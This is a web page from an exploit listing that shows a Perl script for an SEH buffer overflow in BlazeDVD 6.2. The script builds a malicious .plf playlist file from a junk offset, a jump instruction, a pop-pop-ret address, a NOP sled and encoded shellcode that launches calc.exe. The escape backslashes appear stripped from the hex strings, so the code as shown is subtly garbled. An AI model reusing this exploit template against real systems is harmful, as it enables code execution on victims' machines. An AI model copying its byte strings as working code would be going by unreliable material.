Home / exploits BlazeDVD 6.2 Buffer Overflow
Posted on 30 October 2013
#!/usr/bin/perl ######################################################################################### # Exploit Title: BlazeDVD 6.2 .plf Buffer Overflow (SEH) # Date: 10-28-2013 # Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift # Vulnerable Software: BlazeDVD 6.2 # Software Link: http://www.videocharge.com/download/WatermarkMaster_Install.exe # Version: 6.2.0.0 # Tested On: Windows XP SP3 # To exploit, simply open blazesploit.plf file ######################################################################################### my $buffsize = 10000; # sets buffer size for consistent sized payload my $junk = "x41" x 868; # nseh is at offset 868, followed by 2864 bytes of available data my $nseh = "xebx08x90x90"; # overwrite next seh with jmp instruction (8 bytes) my $seh = pack('V',0x6033aa41); # overwrite seh w/ pop ecx pop ecx ret # ASLR: False, Rebase: False, SafeSEH: False, OS: False # Program FilesBlazeVideoBlazeDVD 6.1Configuration.dll my $nops = "x90" x 20; # pad shellcode # Calc.exe payload [size 461] -- Mind the encoding! # msfpayload windows/exec CMD=calc.exe R | # msfencode -e x86/alpha_mixed -c 1 -b 'x00x0ax0dxff' my $shell = "xdbxcdxd9x74x24xf4x5fx57x59x49x49x49x49x49" . "x49x49x49x49x43x43x43x43x43x43x43x37x51x5a" . "x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" . "x42x32x42x42x30x42x42x41x42x58x50x38x41x42" . "x75x4ax49x69x6cx6bx58x4fx79x55x50x75x50x35" . "x50x33x50x4bx39x49x75x66x51x4ax72x52x44x6e" . "x6bx70x52x44x70x6ex6bx42x72x44x4cx4cx4bx63" . "x62x64x54x6ex6bx42x52x54x68x34x4fx6cx77x63" . "x7ax35x76x65x61x4bx4fx74x71x4fx30x6cx6cx65" . "x6cx71x71x53x4cx46x62x76x4cx37x50x49x51x68" . "x4fx76x6dx57x71x6bx77x7ax42x7ax50x32x72x42" . "x77x4cx4bx42x72x44x50x6cx4bx31x52x37x4cx55" . "x51x7ax70x4cx4bx33x70x62x58x4fx75x6bx70x51" . "x64x52x6ax77x71x78x50x42x70x4cx4bx52x68x47" . "x68x4cx4bx46x38x37x50x77x71x5ax73x58x63x55" . "x6cx53x79x4ex6bx66x54x4cx4bx73x31x38x56x75" . "x61x59x6fx36x51x59x50x4cx6cx6ax61x4ax6fx34" . "x4dx46x61x79x57x77x48x49x70x31x65x4bx44x65" . "x53x43x4dx6bx48x65x6bx53x4dx64x64x53x45x6d" . "x32x73x68x6ex6bx70x58x67x54x67x71x39x43x62" . "x46x6cx4bx76x6cx42x6bx4ex6bx62x78x45x4cx37" . "x71x38x53x4cx4bx46x64x4cx4bx45x51x48x50x4c" . "x49x50x44x71x34x47x54x71x4bx31x4bx63x51x31" . "x49x63x6ax70x51x69x6fx39x70x46x38x73x6fx53" . "x6ax4ex6bx56x72x58x6bx4bx36x31x4dx42x4ax55" . "x51x4cx4dx4dx55x38x39x65x50x65x50x65x50x56" . "x30x62x48x75x61x4cx4bx62x4fx4fx77x79x6fx49" . "x45x6fx4bx5ax50x6cx75x4dx72x36x36x42x48x59" . "x36x4ax35x4dx6dx6dx4dx49x6fx49x45x45x6cx45" . "x56x43x4cx76x6ax4fx70x39x6bx4bx50x42x55x36" . "x65x4dx6bx51x57x44x53x62x52x50x6fx62x4ax77" . "x70x56x33x6bx4fx4ax75x35x33x35x31x72x4cx33" . "x53x74x6ex32x45x43x48x75x35x37x70x41x41"; my $sploit = $junk.$nseh.$seh.$nops.$shell; # assemble the sploit my $fill = "x43" x ($buffsize - (length($sploit))); # create buffer fill my $buffer = $sploit.$fill; # assemble final buffer # write the exploit buffer to file my $file = "blazesploit.plf"; open(FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file created [" . $file . "] "; print "Buffer size: " . length($buffer) . " ";
